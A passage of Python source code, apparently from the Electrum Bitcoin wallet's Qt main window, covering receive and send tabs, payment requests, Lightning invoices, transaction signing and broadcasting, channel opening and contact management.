maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs, payjoin=invoice.bip78_payjoin)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
payjoin=None,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
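# An output value of '!' is Electrum's "spend max" sentinel; only one output may
# claim the remaining balance, so more than one '!' is rejected below.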
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs,
payjoin=payjoin)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs,
payjoin=payjoin)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None, payjoin=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self, payjoin=payjoin)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
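# Plugins may wrap the success callback via this hook; the 'tc' prefix refers to the
# trustedcoin (2FA) plugin, which can insert its co-signing step before sign_done runs.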
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
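# BIP70 flow: after a successful broadcast, post the signed transaction and a refund
# address back to the merchant's payment URL and wait (up to 20 s) for the payment ACK.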
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def send_http_request(self, method, url, **kwargs):
return self.network.send_http_on_proxy(method, url, **kwargs)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
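# BOLT-11 tagged fields: the 'd' tag carries the human-readable description, if present.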
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_bip21_uri(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
self.set_payjoin_availability(self.payto_URI)
def set_payjoin_availability(self, out):
""" """
pj = out.get('pj')
pjos = out.get('pjos')
if pj:
self.pj_available = True
self.pj = pj
self.pjos = pjos
else:
self.pj_available = False
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
self.pj_available = False
self.pj = None
self.pjos = None
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
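# mkfunc wraps each Commands method so that calling it from the console automatically
# supplies this window's wallet and a password prompt (password_dialog) when needed.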
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
